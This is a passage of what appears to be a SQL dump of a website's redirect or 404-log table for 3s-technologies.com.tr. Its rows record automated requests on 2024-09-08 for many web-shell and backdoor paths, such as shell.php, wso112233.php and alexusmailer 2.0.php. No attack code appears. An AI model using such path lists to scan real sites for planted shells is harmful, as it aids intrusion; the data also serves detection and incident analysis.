00:00:00',301),(36192,'http://3s-technologies.com.tr/en/images/indexalt.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:45','0000-00-00 00:00:00',301),(36193,'https://3s-technologies.com.tr/en/images/indexalt.php',NULL,'www.google.com','',1,0,'2024-09-08 06:24:49','0000-00-00 00:00:00',301),(36194,'http://3s-technologies.com.tr/en/wp-content/radio.php',NULL,'www.google.com','',5,0,'2024-09-08 06:25:02','0000-00-00 00:00:00',301),(36195,'https://3s-technologies.com.tr/en/wp-content/radio.php',NULL,'www.google.com','',1,0,'2024-09-08 06:25:07','0000-00-00 00:00:00',301),(36196,'http://3s-technologies.com.tr/en/wp-includes/bala.php',NULL,'www.google.com','',2,0,'2024-09-08 06:25:12','0000-00-00 00:00:00',301),(36197,'https://3s-technologies.com.tr/en/wp-includes/bala.php',NULL,'www.google.com','',1,0,'2024-09-08 06:25:16','0000-00-00 00:00:00',301),(36198,'http://3s-technologies.com.tr/en/alexusmailer 2.0.php',NULL,'www.google.com','',3,0,'2024-09-08 06:25:20','0000-00-00 00:00:00',301),(36199,'https://3s-technologies.com.tr/en/alexusmailer 2.0.php',NULL,'www.google.com','',1,0,'2024-09-08 06:25:24','0000-00-00 00:00:00',301),(36200,'https://3s-technologies.com.tr/en/wp-content/about.php',NULL,'www.google.com','',4,0,'2024-09-08 06:25:33','0000-00-00 00:00:00',301),(36201,'http://3s-technologies.com.tr/en/wp_class_datalib.php',NULL,'www.google.com','',3,0,'2024-09-08 06:25:38','0000-00-00 00:00:00',301),(36202,'https://3s-technologies.com.tr/en/wp_class_datalib.php',NULL,'www.google.com','',1,0,'2024-09-08 06:25:43','0000-00-00 00:00:00',301),(36203,'http://3s-technologies.com.tr/en/wp-content/shell.php',NULL,'www.google.com','',4,0,'2024-09-08 06:25:48','0000-00-00 00:00:00',301),(36204,'https://3s-technologies.com.tr/en/wp-content/shell.php',NULL,'www.google.com','',1,0,'2024-09-08 06:25:52','0000-00-00 00:00:00',301),(36205,'https://3s-technologies.com.tr/en/wp-content/think.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:01','0000-00-00 00:00:00',301),(36206,'http://3s-technologies.com.tr/en/.well-known/leaf.php',NULL,'www.google.com','',2,0,'2024-09-08 06:26:05','0000-00-00 00:00:00',301),(36207,'https://3s-technologies.com.tr/en/.well-known/leaf.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:09','0000-00-00 00:00:00',301),(36208,'http://3s-technologies.com.tr/en/.cgi/cache/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:13','0000-00-00 00:00:00',301),(36209,'https://3s-technologies.com.tr/en/.cgi/cache/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:17','0000-00-00 00:00:00',301),(36210,'http://3s-technologies.com.tr/en/wp-includes/radio.php',NULL,'www.google.com','',3,0,'2024-09-08 06:26:21','0000-00-00 00:00:00',301),(36211,'https://3s-technologies.com.tr/en/wp-includes/radio.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:25','0000-00-00 00:00:00',301),(36212,'http://3s-technologies.com.tr/en/wp-admin/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:30','0000-00-00 00:00:00',301),(36213,'https://3s-technologies.com.tr/en/wp-admin/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:34','0000-00-00 00:00:00',301),(36214,'https://3s-technologies.com.tr/en/wp-includes/about.php',NULL,'www.google.com','',1,0,'2024-09-08 06:26:51','0000-00-00 00:00:00',301),(36215,'http://3s-technologies.com.tr/en/.well-known/radio.php',NULL,'www.google.com','',6,0,'2024-09-08 06:26:56','0000-00-00 00:00:00',301),(36216,'https://3s-technologies.com.tr/en/.well-known/radio.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:00','0000-00-00 00:00:00',301),(36217,'http://3s-technologies.com.tr/en/wp-admin/maint/fw.php',NULL,'www.google.com','',3,0,'2024-09-08 06:27:05','0000-00-00 00:00:00',301),(36218,'https://3s-technologies.com.tr/en/wp-admin/maint/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:09','0000-00-00 00:00:00',301),(36219,'http://3s-technologies.com.tr/en/wp-admin/js/acces.php',NULL,'www.google.com','',2,0,'2024-09-08 06:27:13','0000-00-00 00:00:00',301),(36220,'https://3s-technologies.com.tr/en/wp-admin/js/acces.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:18','0000-00-00 00:00:00',301),(36221,'http://3s-technologies.com.tr/en/wp-admin/wso112233.php',NULL,'www.google.com','',6,0,'2024-09-08 06:27:22','0000-00-00 00:00:00',301),(36222,'https://3s-technologies.com.tr/en/wp-admin/wso112233.php',NULL,'www.google.com','',2,0,'2024-09-08 06:27:26','0000-00-00 00:00:00',301),(36223,'http://3s-technologies.com.tr/en/uploads/contexmini.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:30','0000-00-00 00:00:00',301),(36224,'https://3s-technologies.com.tr/en/uploads/contexmini.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:35','0000-00-00 00:00:00',301),(36225,'https://3s-technologies.com.tr/en/wp-includes/991176.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:44','0000-00-00 00:00:00',301),(36226,'http://3s-technologies.com.tr/en/wp-includes/wp-red.php',NULL,'www.google.com','',3,0,'2024-09-08 06:27:48','0000-00-00 00:00:00',301),(36227,'https://3s-technologies.com.tr/en/wp-includes/wp-red.php',NULL,'www.google.com','',1,0,'2024-09-08 06:27:52','0000-00-00 00:00:00',301),(36228,'http://3s-technologies.com.tr/en/wp-admin/css/index.php',NULL,'www.google.com','',7,0,'2024-09-08 06:27:57','0000-00-00 00:00:00',301),(36229,'https://3s-technologies.com.tr/en/wp-admin/css/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:01','0000-00-00 00:00:00',301),(36230,'http://3s-technologies.com.tr/en/wp-admin/css/media.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:23','0000-00-00 00:00:00',301),(36231,'https://3s-technologies.com.tr/en/wp-admin/css/media.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:27','0000-00-00 00:00:00',301),(36232,'http://3s-technologies.com.tr/en/wp-includes/css/xm.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:32','0000-00-00 00:00:00',301),(36233,'https://3s-technologies.com.tr/en/wp-includes/css/xm.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:36','0000-00-00 00:00:00',301),(36234,'http://3s-technologies.com.tr/en/wp-includes/css/wp.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:41','0000-00-00 00:00:00',301),(36235,'https://3s-technologies.com.tr/en/wp-includes/css/wp.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:45','0000-00-00 00:00:00',301),(36236,'http://3s-technologies.com.tr/en/wp-content/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:49','0000-00-00 00:00:00',301),(36237,'https://3s-technologies.com.tr/en/wp-content/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:54','0000-00-00 00:00:00',301),(36238,'http://3s-technologies.com.tr/en/wp-content/wp-admin.php',NULL,'www.google.com','',1,0,'2024-09-08 06:28:58','0000-00-00 00:00:00',301),(36239,'https://3s-technologies.com.tr/en/wp-content/wp-admin.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:02','0000-00-00 00:00:00',301),(36240,'https://3s-technologies.com.tr/en/wp-content/db-cache.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:19','0000-00-00 00:00:00',301),(36241,'https://3s-technologies.com.tr/en/wp-includes/css/css.php',NULL,'www.google.com','',2,0,'2024-09-08 06:29:27','0000-00-00 00:00:00',301),(36242,'http://3s-technologies.com.tr/en/wp-includes/pomo/ex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:41','0000-00-00 00:00:00',301),(36243,'https://3s-technologies.com.tr/en/wp-includes/pomo/ex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:46','0000-00-00 00:00:00',301),(36244,'http://3s-technologies.com.tr/en/wp-content/tcihmfyu.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:50','0000-00-00 00:00:00',301),(36245,'https://3s-technologies.com.tr/en/wp-content/tcihmfyu.php',NULL,'www.google.com','',1,0,'2024-09-08 06:29:54','0000-00-00 00:00:00',301),(36246,'http://3s-technologies.com.tr/en/wp-content/wso112233.php',NULL,'www.google.com','',8,0,'2024-09-08 06:29:58','0000-00-00 00:00:00',301),(36247,'http://3s-technologies.com.tr/en/wp-includes/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:08','0000-00-00 00:00:00',301),(36248,'https://3s-technologies.com.tr/en/wp-includes/.wp-back.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:13','0000-00-00 00:00:00',301),(36249,'http://3s-technologies.com.tr/en/wp-content/wp-logins.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:27','0000-00-00 00:00:00',301),(36250,'https://3s-technologies.com.tr/en/wp-content/wp-logins.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:32','0000-00-00 00:00:00',301),(36251,'https://3s-technologies.com.tr/en/wp-admin/maint/about.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:42','0000-00-00 00:00:00',301),(36252,'http://3s-technologies.com.tr/en/libraries/joomla/css.php',NULL,'www.google.com','',3,0,'2024-09-08 06:30:47','0000-00-00 00:00:00',301),(36253,'https://3s-technologies.com.tr/en/libraries/joomla/css.php',NULL,'www.google.com','',1,0,'2024-09-08 06:30:52','0000-00-00 00:00:00',301),(36254,'https://3s-technologies.com.tr/en/templates/beez/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:31:02','0000-00-00 00:00:00',301),(36255,'http://3s-technologies.com.tr/en/wp-admin/includes/fw.php',NULL,'www.google.com','',3,0,'2024-09-08 06:31:07','0000-00-00 00:00:00',301),(36256,'https://3s-technologies.com.tr/en/wp-admin/includes/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:31:11','0000-00-00 00:00:00',301),(36257,'http://3s-technologies.com.tr/en/wp-includes/ixr/hunt.php',NULL,'www.google.com','',1,0,'2024-09-08 06:31:25','0000-00-00 00:00:00',301),(36258,'https://3s-technologies.com.tr/en/wp-includes/ixr/hunt.php',NULL,'www.google.com','',1,0,'2024-09-08 06:31:30','0000-00-00 00:00:00',301),(36259,'http://3s-technologies.com.tr/en/wp-includes/wso112233.php',NULL,'www.google.com','',4,0,'2024-09-08 06:31:34','0000-00-00 00:00:00',301),(36260,'https://3s-technologies.com.tr/en/wp-includes/wso112233.php',NULL,'www.google.com','',2,0,'2024-09-08 06:31:39','0000-00-00 00:00:00',301),(36261,'http://3s-technologies.com.tr/en/wp-admin/includes/mar.php',NULL,'www.google.com','',3,0,'2024-09-08 06:31:44','0000-00-00 00:00:00',301),(36262,'https://3s-technologies.com.tr/en/wp-admin/includes/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:31:49','0000-00-00 00:00:00',301),(36263,'https://3s-technologies.com.tr/en/wp-admin/setup-config.php',NULL,'www.google.com','',1,0,'2024-09-08 06:32:26','0000-00-00 00:00:00',301),(36264,'http://3s-technologies.com.tr/en/wp-includes/pomo/enki.php',NULL,'www.google.com','',1,0,'2024-09-08 06:32:37','0000-00-00 00:00:00',301),(36265,'https://3s-technologies.com.tr/en/wp-includes/pomo/enki.php',NULL,'www.google.com','',1,0,'2024-09-08 06:32:42','0000-00-00 00:00:00',301),(36266,'https://3s-technologies.com.tr/en/wp-includes/images/css.php',NULL,'www.google.com','',1,0,'2024-09-08 06:32:54','0000-00-00 00:00:00',301),(36267,'http://3s-technologies.com.tr/en/libraries/joomla/jmail.php',NULL,'www.google.com','',5,0,'2024-09-08 06:33:00','0000-00-00 00:00:00',301),(36268,'https://3s-technologies.com.tr/en/libraries/joomla/jmail.php',NULL,'www.google.com','',1,0,'2024-09-08 06:33:06','0000-00-00 00:00:00',301),(36269,'http://3s-technologies.com.tr/en/wp-includes/theme-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:33:28','0000-00-00 00:00:00',301),(36270,'https://3s-technologies.com.tr/en/wp-includes/theme-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:33:33','0000-00-00 00:00:00',301),(36271,'http://3s-technologies.com.tr/en/wp-admin/images/atomlib.php',NULL,'www.google.com','',26,0,'2024-09-08 06:33:39','0000-00-00 00:00:00',301),(36272,'https://3s-technologies.com.tr/en/wp-admin/images/atomlib.php',NULL,'www.google.com','',1,0,'2024-09-08 06:33:45','0000-00-00 00:00:00',301),(36273,'http://3s-technologies.com.tr/en/modules/modules/modules.php',NULL,'www.google.com','',3,0,'2024-09-08 06:33:51','0000-00-00 00:00:00',301),(36274,'https://3s-technologies.com.tr/en/modules/modules/modules.php',NULL,'www.google.com','',1,0,'2024-09-08 06:33:56','0000-00-00 00:00:00',301),(36275,'https://3s-technologies.com.tr/en/wp-includes/css/modules.php',NULL,'www.google.com','',1,0,'2024-09-08 06:34:07','0000-00-00 00:00:00',301),(36276,'http://3s-technologies.com.tr/en/libraries/joomla/jmails.php',NULL,'www.google.com','',5,0,'2024-09-08 06:34:13','0000-00-00 00:00:00',301),(36277,'https://3s-technologies.com.tr/en/libraries/joomla/jmails.php',NULL,'www.google.com','',1,0,'2024-09-08 06:34:18','0000-00-00 00:00:00',301),(36278,'http://3s-technologies.com.tr/en/templates/ theme /error.php',NULL,'www.google.com','',3,0,'2024-09-08 06:34:24','0000-00-00 00:00:00',301),(36279,'https://3s-technologies.com.tr/en/templates/ theme /error.php',NULL,'www.google.com','',1,0,'2024-09-08 06:34:29','0000-00-00 00:00:00',301),(36280,'http://3s-technologies.com.tr/en/templates/ theme /index.php',NULL,'www.google.com','',3,0,'2024-09-08 06:34:39','0000-00-00 00:00:00',301),(36281,'https://3s-technologies.com.tr/en/templates/ theme /index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:34:43','0000-00-00 00:00:00',301),(36282,'http://3s-technologies.com.tr/en/wp-includes/text/sidwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:00','0000-00-00 00:00:00',301),(36283,'https://3s-technologies.com.tr/en/wp-includes/text/sidwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:05','0000-00-00 00:00:00',301),(36284,'http://3s-technologies.com.tr/en/wp-includes/pomo/config.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:09','0000-00-00 00:00:00',301),(36285,'https://3s-technologies.com.tr/en/wp-includes/pomo/config.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:14','0000-00-00 00:00:00',301),(36286,'http://3s-technologies.com.tr/en/wp-includes/pomo/repair.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:18','0000-00-00 00:00:00',301),(36287,'https://3s-technologies.com.tr/en/wp-includes/pomo/repair.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:22','0000-00-00 00:00:00',301),(36288,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-cli.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:26','0000-00-00 00:00:00',301),(36289,'https://3s-technologies.com.tr/en/wp-includes/pomo/wp-cli.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:30','0000-00-00 00:00:00',301),(36290,'http://3s-technologies.com.tr/en/wp-includes/css/wp-atom.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:34','0000-00-00 00:00:00',301),(36291,'https://3s-technologies.com.tr/en/wp-includes/css/wp-atom.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:38','0000-00-00 00:00:00',301),(36292,'https://3s-technologies.com.tr/en/wp-content/uploads/small.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:47','0000-00-00 00:00:00',301),(36293,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-atom.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:51','0000-00-00 00:00:00',301),(36294,'https://3s-technologies.com.tr/en/wp-includes/pomo/wp-atom.php',NULL,'www.google.com','',1,0,'2024-09-08 06:35:56','0000-00-00 00:00:00',301),(36295,'http://3s-technologies.com.tr/en/wp-includes/pomo/xwsoooo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:00','0000-00-00 00:00:00',301),(36296,'https://3s-technologies.com.tr/en/wp-includes/pomo/xwsoooo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:05','0000-00-00 00:00:00',301),(36297,'http://3s-technologies.com.tr/en/wp-includes/css/category.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:09','0000-00-00 00:00:00',301),(36298,'https://3s-technologies.com.tr/en/wp-includes/css/category.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:13','0000-00-00 00:00:00',301),(36299,'https://3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:21','0000-00-00 00:00:00',301),(36300,'https://3s-technologies.com.tr/en/wp-includes/css/wp-config.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:29','0000-00-00 00:00:00',301),(36301,'http://3s-technologies.com.tr/en/templates/ja_purity/index.php',NULL,'www.google.com','',3,0,'2024-09-08 06:36:34','0000-00-00 00:00:00',301),(36302,'https://3s-technologies.com.tr/en/templates/ja_purity/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:36:39','0000-00-00 00:00:00',301),(36303,'http://3s-technologies.com.tr/en/wp-includes/pomo/radiowso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:06','0000-00-00 00:00:00',301),(36304,'https://3s-technologies.com.tr/en/wp-includes/pomo/radiowso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:11','0000-00-00 00:00:00',301),(36305,'http://3s-technologies.com.tr/en/wp-includes/pomo/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:16','0000-00-00 00:00:00',301),(36306,'https://3s-technologies.com.tr/en/wp-includes/pomo/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:20','0000-00-00 00:00:00',301),(36307,'http://3s-technologies.com.tr/en/wp-content/plugins/ppus/up.php',NULL,'www.google.com','',3,0,'2024-09-08 06:37:24','0000-00-00 00:00:00',301),(36308,'https://3s-technologies.com.tr/en/wp-content/plugins/ppus/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:29','0000-00-00 00:00:00',301),(36309,'http://3s-technologies.com.tr/en/wp-admin/network/wp-footer.php',NULL,'www.google.com','',3,0,'2024-09-08 06:37:34','0000-00-00 00:00:00',301),(36310,'https://3s-technologies.com.tr/en/wp-admin/network/wp-footer.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:39','0000-00-00 00:00:00',301),(36311,'http://3s-technologies.com.tr/en/wp-includes/images/wlw/lfx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:43','0000-00-00 00:00:00',301),(36312,'https://3s-technologies.com.tr/en/wp-includes/images/wlw/lfx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:48','0000-00-00 00:00:00',301),(36313,'http://3s-technologies.com.tr/en/wp-content/upgrade/lfgpoem.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:52','0000-00-00 00:00:00',301),(36314,'https://3s-technologies.com.tr/en/wp-content/upgrade/lfgpoem.php',NULL,'www.google.com','',1,0,'2024-09-08 06:37:56','0000-00-00 00:00:00',301),(36315,'http://3s-technologies.com.tr/en/wp-includes/class-wp-query.php',NULL,'www.google.com','',3,0,'2024-09-08 06:38:01','0000-00-00 00:00:00',301),(36316,'https://3s-technologies.com.tr/en/wp-includes/class-wp-query.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:05','0000-00-00 00:00:00',301),(36317,'http://3s-technologies.com.tr/en/wp-admin/images/preg_class.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:09','0000-00-00 00:00:00',301),(36318,'https://3s-technologies.com.tr/en/wp-admin/images/preg_class.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:14','0000-00-00 00:00:00',301),(36319,'http://3s-technologies.com.tr/en/wp-includes/images/wp-blog.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:18','0000-00-00 00:00:00',301),(36320,'https://3s-technologies.com.tr/en/wp-includes/images/wp-blog.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:22','0000-00-00 00:00:00',301),(36321,'http://3s-technologies.com.tr/en/wp-admin/includes/readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:26','0000-00-00 00:00:00',301),(36322,'https://3s-technologies.com.tr/en/wp-admin/includes/readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:31','0000-00-00 00:00:00',301),(36323,'http://3s-technologies.com.tr/en/wp-includes/wp_class_datlib.php',NULL,'www.google.com','',4,0,'2024-09-08 06:38:35','0000-00-00 00:00:00',301),(36324,'https://3s-technologies.com.tr/en/wp-includes/wp_class_datlib.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:40','0000-00-00 00:00:00',301),(36325,'http://3s-technologies.com.tr/en/wp-content/languages/sidwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:44','0000-00-00 00:00:00',301),(36326,'https://3s-technologies.com.tr/en/wp-content/languages/sidwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:48','0000-00-00 00:00:00',301),(36327,'http://3s-technologies.com.tr/en/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:52','0000-00-00 00:00:00',301),(36328,'https://3s-technologies.com.tr/en/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:38:56','0000-00-00 00:00:00',301),(36329,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-login.php',NULL,'www.google.com','',2,0,'2024-09-08 06:39:01','0000-00-00 00:00:00',301),(36330,'https://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-login.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:05','0000-00-00 00:00:00',301),(36331,'http://3s-technologies.com.tr/en/wp-content/uploads/readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:09','0000-00-00 00:00:00',301),(36332,'https://3s-technologies.com.tr/en/wp-content/uploads/readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:13','0000-00-00 00:00:00',301),(36333,'http://3s-technologies.com.tr/en/wp-admin/includes/media-site.php',NULL,'www.google.com','',3,0,'2024-09-08 06:39:17','0000-00-00 00:00:00',301),(36334,'https://3s-technologies.com.tr/en/wp-admin/includes/media-site.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:21','0000-00-00 00:00:00',301),(36335,'http://3s-technologies.com.tr/en/wp-admin/includes/block-line.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:25','0000-00-00 00:00:00',301),(36336,'https://3s-technologies.com.tr/en/wp-admin/includes/block-line.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:29','0000-00-00 00:00:00',301),(36337,'https://3s-technologies.com.tr/en/wp-content/themes/config.bak.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:38','0000-00-00 00:00:00',301),(36338,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-stream.php',NULL,'www.google.com','',3,0,'2024-09-08 06:39:42','0000-00-00 00:00:00',301),(36339,'https://3s-technologies.com.tr/en/wp-content/uploads/wp-stream.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:47','0000-00-00 00:00:00',301),(36340,'http://3s-technologies.com.tr/en/wp-content/plugins/ubh/index.php',NULL,'www.google.com','',4,0,'2024-09-08 06:39:51','0000-00-00 00:00:00',301),(36341,'https://3s-technologies.com.tr/en/wp-content/plugins/ubh/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:39:55','0000-00-00 00:00:00',301),(36342,'http://3s-technologies.com.tr/en/wp-content/plugins/xichang/x.php',NULL,'www.google.com','',6,0,'2024-09-08 06:40:00','0000-00-00 00:00:00',301),(36343,'https://3s-technologies.com.tr/en/wp-content/plugins/xichang/x.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:05','0000-00-00 00:00:00',301),(36344,'http://3s-technologies.com.tr/en/wp-content/upgrade/wp-signup.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:10','0000-00-00 00:00:00',301),(36345,'https://3s-technologies.com.tr/en/wp-content/upgrade/wp-signup.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:15','0000-00-00 00:00:00',301),(36346,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-conflg.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:19','0000-00-00 00:00:00',301),(36347,'https://3s-technologies.com.tr/en/wp-content/uploads/wp-conflg.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:24','0000-00-00 00:00:00',301),(36348,'http://3s-technologies.com.tr/en/templates/rhuk_milkyway/index.php',NULL,'www.google.com','',8,0,'2024-09-08 06:40:29','0000-00-00 00:00:00',301),(36349,'https://3s-technologies.com.tr/en/templates/rhuk_milkyway/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:34','0000-00-00 00:00:00',301),(36350,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/fw.php',NULL,'www.google.com','',3,0,'2024-09-08 06:40:39','0000-00-00 00:00:00',301),(36351,'https://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:40:46','0000-00-00 00:00:00',301),(36352,'https://3s-technologies.com.tr/en/wp-content/themes/gaukingo/db.php',NULL,'www.google.com','',2,0,'2024-09-08 06:40:57','0000-00-00 00:00:00',301),(36353,'http://3s-technologies.com.tr/en/wp-includes/images/wlw/local1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:03','0000-00-00 00:00:00',301),(36354,'https://3s-technologies.com.tr/en/wp-includes/images/wlw/local1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:08','0000-00-00 00:00:00',301),(36355,'http://3s-technologies.com.tr/en/wp-content/uploads/jcjjjjcjjc.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:14','0000-00-00 00:00:00',301),(36356,'https://3s-technologies.com.tr/en/wp-content/uploads/jcjjjjcjjc.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:19','0000-00-00 00:00:00',301),(36357,'http://3s-technologies.com.tr/en/wp-admin/js/wddx_packet_start.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:24','0000-00-00 00:00:00',301),(36358,'https://3s-technologies.com.tr/en/wp-admin/js/wddx_packet_start.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:29','0000-00-00 00:00:00',301),(36359,'https://3s-technologies.com.tr/en/wp-content/plugins/config.bak.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:39','0000-00-00 00:00:00',301),(36360,'http://3s-technologies.com.tr/en/wp-content/plugins/fighter/fk.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:44','0000-00-00 00:00:00',301),(36361,'https://3s-technologies.com.tr/en/wp-content/plugins/fighter/fk.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:49','0000-00-00 00:00:00',301),(36362,'http://3s-technologies.com.tr/en/wp-content/uploads/2021/12/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:53','0000-00-00 00:00:00',301),(36363,'https://3s-technologies.com.tr/en/wp-content/uploads/2021/12/fw.php',NULL,'www.google.com','',1,0,'2024-09-08 06:41:58','0000-00-00 00:00:00',301),(36364,'http://3s-technologies.com.tr/en/wp-content/uploads/2021/12/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:03','0000-00-00 00:00:00',301),(36365,'https://3s-technologies.com.tr/en/wp-content/uploads/2021/12/up.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:07','0000-00-00 00:00:00',301),(36366,'http://3s-technologies.com.tr/en/wp-content/includes/uploads/va.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:12','0000-00-00 00:00:00',301),(36367,'https://3s-technologies.com.tr/en/wp-content/includes/uploads/va.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:17','0000-00-00 00:00:00',301),(36368,'http://3s-technologies.com.tr/en/wp-admin/css/modern/colors.css.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:21','0000-00-00 00:00:00',301),(36369,'https://3s-technologies.com.tr/en/wp-admin/css/modern/colors.css.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:26','0000-00-00 00:00:00',301),(36370,'http://3s-technologies.com.tr/en/components/com_b2jcontact/izoc.php',NULL,'www.google.com','',3,0,'2024-09-08 06:42:30','0000-00-00 00:00:00',301),(36371,'https://3s-technologies.com.tr/en/components/com_b2jcontact/izoc.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:36','0000-00-00 00:00:00',301),(36372,'https://3s-technologies.com.tr/en/wp-content/plugins/cekidot/alf.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:45','0000-00-00 00:00:00',301),(36373,'https://3s-technologies.com.tr/en/wp-content/plugins/upspy/index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:54','0000-00-00 00:00:00',301),(36374,'http://3s-technologies.com.tr/en/wp-includes/css/class.enhanced.php',NULL,'www.google.com','',1,0,'2024-09-08 06:42:59','0000-00-00 00:00:00',301),(36375,'https://3s-technologies.com.tr/en/wp-includes/css/class.enhanced.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:04','0000-00-00 00:00:00',301),(36376,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-contact.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:09','0000-00-00 